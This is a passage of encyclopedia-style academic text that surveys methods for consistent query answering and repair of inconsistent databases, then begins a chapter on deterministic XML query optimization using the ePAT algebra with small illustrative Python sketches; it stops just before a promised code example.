• Arenas et al. (1999) introduced a logical characterization of the notion of consistent answer in a possibly inconsistent database. The technique is based on the computation of an equivalent query Tω(Q) derived from the source query Q. The definition of Tω(Q) is based on the notion of residue developed in the context of semantic query optimization. More specifically, for each literal B appearing in some integrity constraint, a residue Res(B) is computed. Intuitively, Res(B) is a universally quantified first order formula that must be true, because of the constraints, if B is true. The technique, more general than the previous ones, has been shown to be complete for universal binary integrity constraints and universally quantified queries. However, the rewriting of queries is complex, since the termination conditions are not easy to detect and the computation of answers is generally not guaranteed to be polynomial.

• Arenas et al. (2000) proposed an approach consisting in the use of a Logic Program with exceptions (LPe) for obtaining consistent query answers. An LPe is a program with the syntax of an extended logic program (ELP), that is, in it we may find both logical (or strong) negation (¬) and procedural negation (not). In this program, rules with a positive literal in the head represent a sort of general default, whereas rules with a logically negated head represent exceptions. The semantics of an LPe is obtained from the semantics for ELPs by adding extra conditions that assign higher priority to exceptions. The method, given a set of integrity constraints ICs and an inconsistent database instance, consists in the direct specification of database repairs in a logic programming formalism. The resulting program will have both negative and positive exceptions, strong and procedural negations, and disjunctions of literals in the head of some of the clauses, that is, it will be a disjunctive extended logic program with exceptions. As shown by Arenas et al. (1999), the method considers a set of integrity constraints, IC, written in the standard format ∨_{i=1}^{n} P_i(x_i) ∨ ∨_{i=1}^{m} (¬Q_i(y_i)) ∨ φ, where φ is a formula containing only built-in predicates, and there is an implicit universal quantification in front. This method specifies the repairs of the database D that violate IC by means of a logic program with exceptions, ΠD. In ΠD, for each predicate P a new predicate P' is introduced, and each occurrence of P is replaced by P'. The method can be applied to a set of domain independent binary integrity constraints IC, that is, constraints that can be checked for satisfaction by looking at the active domain and in which at most two literals appear.

• Calì, Calvanese, De Giacomo, and Lenzerini (2002), Lembo et al. (2002), and Lenzerini (2002) proposed a framework for data integration that allows one to specify a general form of integrity constraints over the global schema, and they define a semantics for data integration in the presence of incomplete and inconsistent information sources. Moreover, they define a method for query processing under the previous semantics when key constraints and foreign key constraints are defined upon the global schema. Formally, a data integration system I is a triple 〈G, S, MG,S〉, where G is the global schema, S is the source schema, and MG,S is the mapping between G and S. More specifically, the global schema is expressed in the relational model with both key and foreign key constraints; the source schema is expressed in the relational model without integrity constraints; and the mapping is defined between the global and the source schema, that is, each relation in G is associated with a view, that is, a query over the sources. The semantics of a data integration system is given by considering a source database D for I, that is, a database for the source schema S containing a relation rD for each source r in S. Any database B is a global database for I, and it is said to be legal w.r.t. D if:
  ◦ It satisfies the integrity constraints defined on G.
  ◦ It satisfies the mapping w.r.t. D, that is, for each relation r in G, the set of tuples rB that B assigns to r contains the set of tuples ρ(r)D computed by the associated query ρ(r) over D: ρ(r)D ⊆ rB.
  In this framework, the semantics of I w.r.t. a source database D, denoted semD(I, D), is given in terms of a set of databases. In particular, semD(I, D) = { B | B is a legal global database for I w.r.t. D }. If semD(I, D) ≠ ∅, then I is said to be consistent w.r.t. D. In this setting, a query q posed to a data integration system I is a conjunctive query over the global schema, whose atoms have symbols in G as predicates. A tuple (c1, .., cn) is considered an answer to the query only if it is a certain answer, that is, if it satisfies the query in every database that belongs to the semantics of the data integration system. The retrieved global database, denoted by ret(I, D), is obtained by computing, for each relation r of the global schema, the associated query ρ(r) over the source database D. Note that the retrieved global database satisfies all the key constraints in G, as it is assumed that ρ(r) does not violate the key constraints; thus, if ret(I, D) also satisfies the foreign key constraints, then the answer to a query q can be computed by simply evaluating it over ret(I, D). If it is the case that ret(I, D) violates the foreign key constraints, then tuples have to be added to the relations of the global schema in order to satisfy them. Obviously, in general there is an infinite number of legal databases that are coherent with the retrieved global database, even if it is shown that there exists one, the canonical database, denoted can(I, D), that represents all the legal databases that are coherent with the retrieved global database. Thus, formally, the answer to a query q can be given by evaluating can(I, D). Anyhow, the computation of the canonical database is impractical, as in general the database can be infinite; thus, Calì et al. (2002) defined an algorithm that computes the certain answers of a conjunctive query q without actually building can(I, D).

• Wijsen (2003) proposed a general framework for repairing databases. In particular, the author stressed that an inconsistent database can be repaired without deleting tuples (tuple-based approach), but using a finer repair primitive consisting in correcting faulty values within the tuples, without actually deleting them (value-based approach).

Example 2: Suppose we have the following set of tuples reporting the dioxin levels in food samples (see below), and the constraint:
which imposes that the date a given sample is analyzed cannot precede the date the sample was taken. The first tuple in the Dioxin Database says that the sample 110 was taken on January 17, 2002, and analyzed the day after at the ICI lab, and that the dioxin level of this sample was normal. While the sample 110 respects the constraint, the sample 220 violates it. An inconsistency is present in the database, and the author proposes to "clean" it in a way that avoids deleting the entire tuple, that is, acting at the attribute level and not at the tuple level. Given an inconsistent database, a consistent answer can be obtained by leaving the database in its inconsistent state and by propagating into the answer the consistent portion of the database, that is, the set of tuples matching the query and satisfying the constraints. As the repair work is deferred until query time, this approach is called late-repairing. In this framework an alternative technique is proposed, consisting in a database transformation: given a satisfiable set of constraints Σ, that is, a set of finite constraints, and a relation I, apply a database transformation hΣ : I → I such that for every query Q, Q(hΣ(I)) yields exactly the consistent answer to Q on input I and Σ. Observe that hΣ(I) is not necessarily a repair for I and Σ; it can be thought of as a "condensed representation" of all possible repairs for I and Σ that is sufficient for consistent query answering. The practical intuition is that an inconsistent database I is first transformed through hΣ in such a way that subsequent queries on the transformed database retrieve exactly the consistent answer; since databases are modified prior to query execution, this approach is called early-repairing.
Clearly for a given set of satisfiable constraints Σ, early and late repairing should yield the same set of consistent answers, hence fΣ(Q)(I)=Q(hΣ(I)), for every query and every relation.
A NEW TECHNIQUE FOR QUERYING AND REPAIRING INCONSISTENT DATABASES Greco, Greco, and Zumpano (2001, 2003) and Greco and Zumpano (2000) proposed a general framework for computing repairs and consistent answers over inconsistent databases with universally quantified variables. The technique is based on the rewriting of constraints into extended disjunctive rules with two different forms of negation (negation as failure and classical negation). The disjunctive program can be used for two different purposes: compute “repairs” for the database, and produce consistent answers, that is, a maximal set of atoms that do not violate the constraints. The technique is sound and complete (each stable model defines a repair, and each repair is derived from a stable model) and more general than techniques previously proposed. Specifically, the technique is based on the generation of an extended disjunctive program LP derived from the set of integrity constraints. The repairs for the database can be generated from the stable models of LP, whereas the computation of the consistent answers of a query (g,P) can be derived by considering the stable models of the program P ∪ LP over the database D. Let c be a universally quantified constraint of the form: ∀ X [ B1 ∧ ... ∧ Bk ∧ not Bk+1 ∧ ... ∧ not Bn ∧ φ ⊃ B0 ] then, dj(c) denotes the extended disjunctive rule
¬B'1 ∨ ... ∨ ¬B'k ∨ B'k+1 ∨ ... ∨ B'n ∨ B'0 ← (B1 ∨ B'1), …, (Bk ∨ B'k), (not Bk+1 ∨ ¬B'k+1), …, (not Bn ∨ ¬B'n), φ, (not B0 ∨ ¬B'0),

where B'i denotes the atom derived from Bi by replacing the predicate symbol p with the new symbol pd if Bi is a base atom, and is equal to false otherwise. Let IC be a set of universally quantified integrity constraints; then DP(IC) = { dj(c) | c ∈ IC }, whereas LP(IC) is the set of standard disjunctive rules derived from DP(IC) by rewriting the body disjunctions. Clearly, given a database D and a set of constraints IC, LP(IC)D denotes the program derived from the union of the rules LP(IC) with the facts in D, whereas SM(LP(IC)D) denotes the set of stable models of LP(IC)D; every stable model is consistent since it cannot contain two atoms of the form A and ¬A. The following example shows how constraints are rewritten.
Example 3: Consider the following integrity constraints:
∀X [ p(X) ∧ not s(X) ⊃ q(X) ]
∀X [ q(X) ⊃ r(X) ]
and the database D containing the facts p(a), p(b), s(a), and q(a). The derived generalized extended disjunctive program is defined as follows:
¬pd(X) ∨ sd(X) ∨ qd(X) ← (p(X) ∨ pd(X)) ∧ (not s(X) ∨ ¬sd(X)) ∧ (not q(X) ∨ ¬qd(X)).
¬qd(X) ∨ rd(X) ← (q(X) ∨ qd(X)) ∧ (not r(X) ∨ ¬rd(X)).
The previous rules can now be rewritten in standard form. Let P be the corresponding extended disjunctive Datalog program. The computation of the program PD gives the following stable models:
M1 = D ∪ { ¬pd(b), ¬qd(a) },
M2 = D ∪ { ¬pd(b), rd(a) },
M3 = D ∪ { ¬qd(a), sd(b) },
M4 = D ∪ { rd(a), sd(b) },
M5 = D ∪ { qd(b), ¬qd(a), rd(b) }, and
M6 = D ∪ { qd(b), rd(a), rd(b) }.
A (generalized) extended disjunctive Datalog program can be simplified by eliminating from the rule bodies all literals whose predicate symbols are derived and do not appear in the head of any rule (these literals cannot be true). As mentioned before, the rewriting of constraints into disjunctive rules is useful for both (1) making the database consistent through the insertion and deletion of tuples, and (2) computing consistent answers while leaving the database inconsistent.

FUTURE TRENDS
As a future trend, an interesting topic consists in specifying preference criteria so that, among a set of feasible repairs, the preferable ones can be selected, that is, those better conforming to the specified criteria. Preference criteria introduce desiderata on how to update the inconsistent database in order to make it consistent; thus they can be considered as a set of desiderata that are satisfied, if possible, by a generic repair. Therefore, informally, a preferred repair is a repair that better satisfies the preferences. Preliminary results have been published by Greco, Sirangelo, and Trubitsyna (2003).
CONCLUSION In the integration of knowledge from multiple sources, two main steps are performed, the first in which the various relations are merged together,
and the second in which some tuples are removed (or inserted) from the resulting database in order to satisfy integrity constraints. The database obtained from the merging of different sources could contain inconsistent data. In this article we investigated the problem of querying and repairing inconsistent databases. In particular we presented the different techniques for querying and repairing inconsistent databases (Agarwal et al., 1995; Arenas et al., 1999; Greco & Zumpano, 2000; Lin & Mendelzon, 1996).
REFERENCES
Agarwal, S., Keller, A. M., Wiederhold, G., & Saraswat, K. (1995). Flexible relation: An approach for integrating data from multiple, possibly inconsistent databases. ICDE Conference (pp. 495-504).
Arenas, M., Bertossi, L., & Chomicki, J. (1999). Consistent query answers in inconsistent databases. PODS Conference (pp. 68-79).
Arenas, M., Bertossi, L., & Chomicki, J. (2000). Specifying and querying database repairs using logic programs with exceptions. FQAS Conference (pp. 27-41).
Baral, C., Kraus, S., Minker, J., & Subrahmanian, V. S. (1999). Combining knowledge bases consisting of first order theories. ISMIS Conference (pp. 92-101).
Bry, F. (1997). Query answering in information systems with integrity constraints. IFIP WG 11.5 Working Conference on Integrity and Control in Information Systems (pp. 113-130).
Calì, A., Calvanese, D., De Giacomo, G., & Lenzerini, M. (2002). Data integration under integrity constraints. CAiSE Conference (pp. 262-279).
Dung, P. M. (1996). Integrating data from possibly inconsistent databases. CoopIS Conference (pp. 58-65).
Grant, J., & Subrahmanian, V. S. (1995). Reasoning in inconsistent knowledge bases. TKDE, 7, 177-189.
Greco, G., Greco, S., & Zumpano, E. (2001). A logic programming approach to the integration, repairing and querying of inconsistent databases. ICLP Conference (pp. 348-364).
Greco, G., Greco, S., & Zumpano, E. (2003). A logical framework for querying and repairing inconsistent databases. TKDE, 15, 1389-1408.
Greco, G., Sirangelo, C., Trubitsyna, I., & Zumpano, E. (2003). Preferred repairs for inconsistent databases. IDEAS Conference (pp. 202-211).
Lembo, D., Lenzerini, M., & Rosati, R. (2002). Incompleteness and inconsistency in information integration. KRDB Conference, Toulouse, France.
Lenzerini, M. (2002). Data integration: A theoretical perspective. PODS Conference (pp. 233-246).
Lin, J. (1996). A semantics for reasoning consistently in the presence of inconsistency. Artificial Intelligence, 86(1), 75-95.
Lin, J., & Mendelzon, A. O. (1996). Merging databases under constraints. International Journal of Cooperative Information Systems, 1(7), 55-76.
Wijsen, J. (2003). Condensed representation of database repairs for consistent query answering. ICDT Conference (pp. 378-393).
KEY TERMS
Consistent Answer: A set of tuples, derived from the database, satisfying all integrity constraints.
Consistent Database: A database satisfying a set of integrity constraints.
Data Integration: A process providing uniform, integrated access to multiple heterogeneous information sources.
Database Repair: A minimal set of insert and delete operations that makes the database consistent.
Disjunctive Datalog Program: A set of rules of the form:
A1 ∨ … ∨ Ak ← B1, ..., Bm, not Bm+1, …, not Bn,   k+m+n>0,
where A1, …, Ak, B1, …, Bn are atoms of the form p(t1, ..., th), p is a predicate symbol of arity h, and the terms t1, ..., th are constants or variables.
Inconsistent Database: A database violating some integrity constraints.
Integrity Constraints: A set of constraints that must be satisfied by database instances.
This work was previously published in Encyclopedia of Information Science and Technology, Second Edition, edited by M. Khosrow-Pour, pp. 691-695, copyright 2009 by Information Science Reference (an imprint of IGI Global).
Chapter 7.4
A Deterministic Approach to XML Query Processing with Efficient Support for Pure and Negated Containments
Dunren Che
Southern Illinois University Carbondale, USA
ABSTRACT
This article reports the result of the author’s recent work on XML query processing/optimization, which is a very important issue in XML data management. In this work, in order to more effectively and efficiently handle XML queries involving pure and/or negated containments, a previously proposed deterministic optimization approach is largely adapted. This approach resorts to heuristic-based deterministic transformations on algebraic query expressions in order to achieve the best possible optimization efficiency. Specialized transformation rules are thus developed, and efficient implementation algorithms for pure and negated containments are presented as well. Experimental study confirms the validity and effectiveness of the presented approach and algorithms in processing of XML queries involving pure and/or negated containments.
INTRODUCTION
XML has become the de facto standard for information representation and data exchange on the Internet and elsewhere. As a result, more and more data sources have been adopting the XML standard. The rapid accumulation of XML data calls for specialized solutions for managing and querying XML data resources. Among the many challenges related to XML database management technology, XML query optimization is very interesting because it not only is a critical issue for XML DBMSs but also provides a key infrastructure for the future semantic Web and its applications (especially semantic-based Web search engines). Query optimization typically applies the cost-based approach (Selinger, Astrahan, Chamberlin, Lorie, & Price, 1979) and aims at obtaining the least expensive—the optimal—evaluation plan for each input query. Heuristic knowledge may
be exploited in addition so that a reduced number of (only highly potential) candidate plans need to be examined and from which the best plan is to be identified. XML data has the semi-structured nature and XML queries needed to check not only the contents but also the structural patterns of the source XML data. Comparing to relational data, XML data has higher complexity (as it has to additionally deal with the structural part), and this complexity trivially translates to an enlarged search space for the “optimal” plan during query optimization (assuming the cost-based approach is adopted). Consequently, a plain application of the cost-based optimization approach does not usually yield the same good efficiency for XML queries as it does for relational queries. On the other hand, apart from adding extra complexity and causing inefficient (cost-based) query optimization, the structural part of XML data implies a rich resource of knowledge that can be used in favor of efficient optimization of XML queries. We are thus motivated to develop a comprehensive optimization framework for XML queries. This framework consists of two separate yet collaborative optimization stages. The first stage performs logical-level optimization. This stage is unique to XML as it explores the specific features (e.g., semantic knowledge) of XML data for query optimization. By its nature, this stage is strongly heuristic-based because it does not rely on any particular knowledge about the underlying storage structure. The second stage—physical optimization—typically applies specialized cost-based optimization techniques. In such an optimization framework, these two stages need to collaborate in a way that the first stage provides a reduced (or pre-screened) set of logical plans to the second stage and the latter shall conduct specialized techniques for cost-based optimization by adequately considering the optimization that has already been exerted at the first stage. In previous research (Che, 2003, 2005, 2006), we studied the query equivalence issue in the
context of XML, which forms the basis of our transformation-based optimization approach to XML queries. A comprehensive methodology for fast XML query optimization at the logic level was proposed (Che, Aberer, & Özsu, 2006), based on the exclusive application of deterministic transformations on XML queries represented as PAT algebraic expressions (Böhm, Aberer, Özsu, & Gayer, 1998; Salminen & Tompa, 1994). The utmost benefit of this unique approach is its great potential for optimization efficiency. More recently, we substantially extended the PAT algebra, which led to ePAT (extended PAT), endowed with more expressive power. Based on ePAT, we redefined the query equivalences and the deterministic transformation rules, and adapted the prior optimization strategy in order to efficiently support XML queries with pure and/or negated containments. Containment is a core operation in XML queries, and negated containment is as important as regular containment (for example, “find all employees who do not have a homepage,” though simple, can be a common (sub-)query pattern). However, little result on efficient support for pure and negated containments has been reported. In this article, we make the following contributions:
• An adapted deterministic optimization approach for XML queries with pure and/or negated containments is presented.
• A group of specialized join algorithms dedicated to pure and negated containment operations is proposed (recognizing that the known structural join algorithms (Srivastava et al., 2002; Zhang, Naughton, DeWitt, Luo, & Lohman, 2001) cannot provide efficient support for these special containment operations).
• An experimental study is conducted, and the obtained result confirms the validity and effectiveness of this new approach and the specialized supporting algorithms.
The remainder of this article is set forth as follows: the second section provides necessary background knowledge and a sketchy overview of the new approach. The third section illustrates the new approach by presenting sample deterministic transformation rules that are later on applied to a running example (query). The fourth section presents a number of specialized join algorithms intended for pure and negated containments. The fifth section addresses the experimental study and result. The sixth section reviews related work before the article is finally concluded in the seventh section.
BACKGROUND KNOWLEDGE The main theme of this work is to carry out deterministic transformations on algebraic query expressions for optimization. This section first reviews a few important notions, then the ePAT algebra adopted in this work; after that, sample XML query equivalences are provided, and lastly, an overview of the adapted approach is furnished.
Basis Notions In XML documents/data, elements are identified by means of “tags.” For a given class of documents, the legal markup tags are defined in a DTD/XSD (XML Schema Definition). DTD and XSD basically serve the same kind of function, but the latter is more powerful. The presentation in this article is based on DTD, but the approach presented shall straightforwardly extend to the situations when XSD is used instead. A tag (with a distinct name) defined in a DTD corresponds to a type of XML data element, which may comprise some other tags in its content model. The constructional relationships among the element types are an important source of knowledge that will be utilized by our approach for efficiently pursuing XML query optimization. We introduce the DTD-graph mechanism to help envision important structural relationships among the element types. Instead of providing a formal definition for this notion, we use an example to illustrate it. Figure 1 shows part of the structural relationships existing among the elements (types) about open auctions, which was adopted by the
Figure 1. A portion of the XMark benchmark DTD-graph annotated with index info.
XMark benchmark project (Schmidt et al., 2002). In Figure 1, a dashed arrowed line (which is not a necessary part of a DTD-graph) indicates that a structure index is available. A structure index is formally defined as a map from the extent of one element type to the extent of another element type (Che et al., 2006). A structure index may be intuitively considered as a “shortcut” between the two related extents (of two different element types). In our test-bed, structure indices are implemented as materialized (or pre-computed) structural join results (Srivastava et al., 2002; Zhang et al., 2001). Containment is the dominant structural relationship in XML and is at the core of both query languages, XPath (Clark & DeRose, 1999) and XQuery (Boag et al., 2003). Containments can be differentiated into direct containments (i.e., parent-child relations) and indirect containments (i.e., ancestor-descendant relations). A path in a DTD-graph is a sequence of edges. Paths are the primary means used in both XQuery (Boag et al., 2003) and XPath (Clark et al., 1999) to capture the structural relationships among the data elements. In addition to the DTD-graph and the path notions, we adopt three other important notions for capturing particularly interesting structural relationships in XML data. These notions were initially introduced by Böhm et al. (1998) and are extensively exploited in Che et al. (2006). We review the three notions below; an illustrative sketch of how such properties can be checked follows the list.
1. Definition (Exclusivity): Element type ETj is exclusively contained in element type ETi if each path (ej, …, ek), with ej being an element of type ETj and ek the document root, contains an element of type ETi.
2. Definition (Obligation): Element type ETi obligatorily contains element type ETj if each element of type ETi in any document complying with the DTD has to contain an element of type ETj.
3. Definition (Entrance location): Element type EL is an entrance location for τ(E1) and τ(E2) given in a DTD if, in any document complying with the DTD, all paths from an element e1 of τ(E1) to an element e2 of τ(E2) toward the document root pass through an element el of τ(EL).
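As referenced above, the following rough Python sketch shows how a property such as exclusivity could be checked mechanically; it assumes a small, cycle-free DTD-graph with hypothetical element-type names and is an illustration of the definitions, not the author's implementation:

# DTD-graph as a map from an element type to its possible parent types
# (hypothetical fragment loosely modeled on the XMark open_auction subtree)
parents = {
    "keyword": {"description"},
    "description": {"annotation"},
    "annotation": {"open_auction"},
    "bidder": {"open_auction"},
    "open_auction": {"site"},
    "site": set(),          # document root
}

def exclusively_contained(etj, eti):
    """True if every path from etj toward the root passes through eti."""
    def all_paths_hit(et):
        if et == eti:
            return True
        ps = parents[et]
        if not ps:              # reached the root without meeting eti
            return False
        return all(all_paths_hit(p) for p in ps)
    return etj != eti and all_paths_hit(etj)

print(exclusively_contained("keyword", "description"))   # True
print(exclusively_contained("bidder", "description"))    # False

Obligation and entrance location can be tested in a similar path-enumeration style over the same graph.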
The ePAT Algebra for XML Query Optimization
It is typical in a query optimizer to represent queries as algebraic expressions so that alternate evaluation plans can be expediently explored based on equivalent transformations. ePAT is the algebra adopted in this work, which is extended from PAT (Böhm et al., 1998; Salminen et al., 1994). In ePAT, an expression is generated according to the following grammar:
Ε ::= etn | (Ε) | Ε1 ∪ Ε2 | Ε1 ∩ Ε2 | Ε1 − Ε2 | σr(Ε) | σa,r(Ε) | Ε1 ⊂ Ε2 | Ε1 ⊃ Ε2 | Ε1 ×c Ε2 | πpl(Ε) | Ι(Ε) | −Ε
“E” (as well as “E1” and “E2”) stands for an ePAT expression, and etn, as the only atomic expression, retrieves the whole extent (i.e., all the instances) of the element type named etn. The expression (E) produces the same result as E and is needed mainly for composition purposes. ∪, ∩, and − are the three standard set operations; ePAT requires type compatibility for its set operations. σr(Ε) and σa,r(Ε) are the two basic selection operators applied to the textual contents and attribute values of elements, respectively. The “r” parameter in the two selection operators introduces a regular expression specifying a matching condition on the textual contents or attribute values of elements, and the “a” in σa,r(Ε) designates a particular attribute name. ⊂ returns the elements of the first argument that are contained in an element determined by the second argument, and ⊃ returns the elements of the first argument that contain an element of the second argument. ×c is a “power” join operation that can be tailored to
almost any specific form of joins such as structural joins (Srivastava et al., 2002; Zhang et al., 2001), unstructural joins (i.e., joins not based on any structural relationship), and Cartesian products based on the nature of the join predicate specified by the parameter c. πpl is the projection operator that carries a projection list specified by the parameter pl. I is a generic operation that connotes the application of a relevant index of any type (such as content indices of elements, value indices of attributes, and structure indices). Finally, −E stands for the “negated” form of E and here the E subexpression is limited to only a selection or a containment operation. When it is a selection, the negation is logically applied to the filtering condition of the selection operation; when it is a containment (e.g., Ε 1 ⊃ Ε 2), the negation is applied to the containment operation. It is helpful to point out that in the ePAT algebra, the containment operations, ⊃ and ⊂, are redundant (analogous to the natural join operation in the relational algebra), considering that they can be represented as a general structural join followed by a leftward projection. Yet, there are advantages of retaining this redundancy: considering the dominant role of containment operations in XML data and XML queries, dedicated containment operations greatly facilitate exploiting the structural relationships in XML data for query optimization. We use the following query as a running example. First, we show how the query is formulated as an ePAT expression. Later on, we show how (logical) optimization can be achieved through consecutive deterministic transformations performed on ePAT expressions. Example. Find the keyword from the annotation of an open _ auction that has received a bid from the person (an instance of bidder) whose reference is 123. A partial DTD-graph of the XML data source is shown in Figure 1. The corresponding XPath
expression and ePAT expression are respectively formulated as follows (our query optimization and processing will be solely based on ePAT expressions). XPath: //open_auction[./bidder[@personref=“123”]]/annotation//keyword ePAT: (keyword ⊂ (description ⊂ (open_auction ⊃ σa=‘personref’, r=‘123’ (Bidder))))
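For illustration only, the running example can be held as a small expression tree on which the later transformation rules operate; the sketch below (Python, with hypothetical class names that are not part of ePAT or its implementation) builds the algebraic form given above:

from dataclasses import dataclass

@dataclass
class ETN:                 # atomic expression: the full extent of an element type
    name: str

@dataclass
class Contains:            # E1 ⊃ E2
    left: object
    right: object

@dataclass
class IsContained:         # E1 ⊂ E2
    left: object
    right: object

@dataclass
class AttrSelect:          # σ_{a,r}(E)
    attr: str
    regex: str
    arg: object

# (keyword ⊂ (description ⊂ (open_auction ⊃ σ_{a='personref', r='123'}(bidder))))
query = IsContained(
    ETN("keyword"),
    IsContained(
        ETN("description"),
        Contains(ETN("open_auction"),
                 AttrSelect("personref", "123", ETN("bidder")))))
print(query)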
Sample XML Query Equivalences Our approach to XML query optimization is based on equivalent algebraic transformations, which are accomplished via deterministic transformation rules derived from equivalences in cooperation with relevant heuristics for query optimization in the context of XML. While these deterministic rules embody our optimization methodology, the equivalences form the basis of this work. In the following, sample equivalences are provided for illustration purpose. We identify three knowledge sources from which equivalences can be derived: set-theory properties, explicit constraints imposed by DTD/XSD, and hidden constraints representing knowledge about the structure of XML data (often implied in DTD/XSD). Accordingly, our equivalences are classified into three categories. It is worth noting that we would have obtained a (very) large number of equivalences including less-useful or even useless ones, if we do not limit our choice to only those potential ones from which profitable transformations can be derived. For instance, am equivalence must not imply transformations that merely complicate/expand a query without improving the query’s evaluation efficiency (from a heuristic point of view). In our work, equivalences take the form of “E1 ⇔ E2” and transformation rules take the form of “E1 ⇒ E2.” For compactness, we will use “σ” to simply represent both σr and σa,r, and use EL as a short hand notation for “entrance location.”
In the following, we present sample equivalences from each category.
Set-Oriented Equivalences
As ePAT is a set-based algebra, a group of equivalences was directly derived from the set-theoretic properties of the relevant ePAT operators. A couple of these equivalences are given next (a complete list can be found in Che et al., 2006):
ε1. (Ε1 ⊃ Ε2) ∩ Ε3 ⇔ (Ε1 ∩ Ε3) ⊃ Ε2
ε2. (Ε1 ⊃ Ε2) ⊃ Ε3 ⇔ (Ε1 ⊃ Ε3) ⊃ Ε2
Equivalence ε2 is called the commutativity law of the containment operations.

Equivalences Based on Explicit DTD Constraints
There are equivalences based on checking the explicit constraints as given by the DTD/XSD. Two such examples are given next (the symbol τ is used to denote the resultant type of a query expression):
ε3. σa,r(E) ⇔ φ if ‘a’ isn’t an attribute of τ(E)
ε4. E1 ⊂ E2 ⇔ φ if τ(E1) isn’t contained in τ(E2)

Equivalences Based on Derived Constraints About XML Document Structure
This is a far more interesting class of equivalences, as they bear the potential of rendering significant improvement on input query expressions. Following are a few samples of these types of equivalences:
ε5. (E1 ⊃ E2) ⊃ E3 ⇔ E1 ⊃ (E2 ⊃ E3) if τ(E2) is an EL for τ(E1) and τ(E3)
ε6. (E1 ⊃ E2) ⊃ E3 ⇔ E1 ⊃ (E3 ⊃ E2) if τ(E3) is an EL for τ(E1) and τ(E2)
ε7. E1 ⊂ E2 ⇔ E1 ⊂ (E3 ⊂ E2) if τ(E3) is an EL for τ(E1) and τ(E2)
ε5 is referred to as the associativity of the containment operations. ε6 embodies both the properties of commutativity and associativity in a single equivalence; thus we coined a new name, cossociativity, to characterize this specific algebraic law in the context of XML. ε7 directly connotes the meaning of the entrance location concept. Similar equivalences hold when all occurrences of ⊃ in ε1, ε2, ε5, and ε6 are substituted by ⊂. Combined application of these algebraic laws with the concepts exclusivity, obligation, and entrance location introduced at the beginning of this section yields more equivalences, which form the basis of our deterministic optimization approach as detailed in Che et al. (2006).

Strategy Overview
We identify a large set of potential equivalences as the basis for XML query optimization; these equivalences are centered around the containment operations. However, equivalences are not directly used in our approach for query optimization (this is in contrast to the traditional way, such as in Graefe & DeWitt, 1987, where equivalences are directly used for plan enumeration). Instead, we recognize the potential of XML document structure in query optimization and the specific feature of XML queries (i.e., always carrying a structure pattern). We are prompted to focus our attention on the logic-level optimization of XML queries as the first step toward thorough optimization. As such, optimized queries may need to be further complemented by a succeeding physical, cost-based optimizer in case highly optimized query plans are expected (e.g., by repeatedly running and complex queries). Otherwise, the logical optimizer alone can be used. Therefore, our emphasis is on logical optimization, and our approach is designed to extensively explore the rich structure knowledge of XML data to achieve fast XML query optimization.
To obtain the previous goal, we derive heuristic-based, deterministic transformation rules based on the identified equivalence in collaboration with relevant heuristics and the availability of structure indices built in an XML database. These transformation rules are applied to each query (expression) step-by-step, and each performed transformation solidly improves the input query (in terms of evaluation efficiently) until no more transformations can be performed. During this process, transformation rules are arranged in a certain order according to well-established optimization heuristics. When there are multiple rules applicable to an input expression, the precedence is always given to the first applicable rule. The details of our rule control strategy and the transformation algorithms can be found in Che (2005) and Che et al. (2006). In this article, we limit our discussion to the optimization issue of query expressions involving only the main ePAT operators: etn, ∩, ∪, −, σ, ⊃, ⊂. Logical optimization in this work consists of three consecutive transformation phases: normalization, semantic optimization, and simplification (clean up). The normalization phase enforces straightforward DTD/XSD constraints, performs straightforward simplification, and reorders operators in the following order (from bottom up): etn, ∩, −, σ, ⊃, ⊂ , ∪. It is interesting to note that, after this phase, all ∩ and − operations sediment to the bottom on the operation tree and get ultimately eliminated from the query expressions after applying dedicated transformation rules. The second phase, semantic optimization, starts with a normalized ePAT expression, explores deep structure knowledge of XML data in order to render an application of a potential structure index into the query. Due to the particular pattern that a query expression may be in, structure indices, although available, may not be applicable to the query. The central goal of the second phase is to reveal such opportunities.
The third phase performs a thorough cleaning-up. For this purpose, an intensive set of simplification rules are needed, including rules specially added for handling the possible redundancy that might be rendered by the second (main) phase. A key feature of our approach is that deterministic transformations are exclusively applied to all queries at all three phases to achieve quick optimization. Consequently, a typical problem of all rule-based systems—uncontrollable runtime behavior—is expediently circumvented. A second important feature is that after thorough transformation of an input query for optimization, the ∩ and − operations eventually get eliminated. This once again brings enhanced performance to the optimization itself and to the optimized queries.
DETERMINISTIC XML QUERY OPTIMIZATION This section presents selected transformation rules and addresses the heuristics behind these rules.
Normalization The normalization phase has three main tasks: enforcing simple DTD-constraints, reordering the operators (to facilitate semantic optimization at the second phase), and performing straightforward simplification.
Enforcing Explicit DTD-Constraints
We do not assign this task to the query parser because we do not generally assume the existence of database schemas in the context of XML, due to the semi-structured nature of XML data. This group of rules checks the queries’ consistency with the explicit constraints induced by a given DTD/XSD (if any). A couple of example rules are given below:
R1. σa,r (E) ⇒ φ if ‘a’ is not an attribute of τ(E) R2. E1 ⊂ E2 ⇒ φ if τ(E1) is not contained in τ(E2)
Operator Reordering
The goal of this group of rules is to completely eliminate the ∩ and − operations from a query, and to re-permute the remaining operators in the following order: etn and σ at the bottom, ⊃ and ⊂ in the middle, and ∪ on the top, in order to facilitate the subsequent semantic optimization phase in achieving its primary goal, namely bringing a beneficial structure index into a query if possible. Several example rules are given next (the negated operators, originally written with an overbar, are rendered here as ⊅ for the negated form of ⊃ and ¬σ for the negated form of σ):
R3. σ(E1 ∪ E2) ⇒ σ(E1) ∪ σ(E2)
R4. E1 − (E2 ⊃ E3) ⇒ E1 ∩ (E2 ⊅ E3)
R5. (E1 ⊃ E2) ∩ E3 ⇒ (E1 ∩ E3) ⊃ E2
R6. E ∩ E ⇒ E
R7. σ(E1 ⊃ E2) ⇒ σ(E1) ⊃ E2
R8. (E1 ⊃ E2) ⊃ E2 ⇒ E1 ⊃ E2
R9. −σ(E) ⇒ ¬σ(E)
R10. −(E1 ⊃ E2) ⇒ E1 ⊅ E2
Successful application of R5 makes it possible for R6 to eliminate an occurrence of the ∩ operator. The binary “−” operator is dealt with in a similar way. The unary “−” operation (which negates a selection or a containment) is eliminated differently: R9 and R10 absorb the negation into the subsequent selection or containment operation. Ideally, specialized join algorithms for ⊅ will be provided for a direct and efficient implementation of the operation, while ¬σ is easily handled by simply interpreting the negation as negating the selection operator’s filtering predicate. The above discussion applies similarly to the ⊂ operator (i.e., by working with the counterparts of rules R4, R5, R7, R8, and R10 after ⊃ is replaced by ⊂ in these rules).
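The deterministic control strategy can be pictured as trying an ordered rule list on an expression tree and always committing to the first rule that applies. The following simplified Python sketch (hypothetical tuple encoding, only R5 and R6 shown; it is an illustration of the idea, not the actual optimizer) shows how one application of R5 enables R6 to eliminate an ∩ operation:

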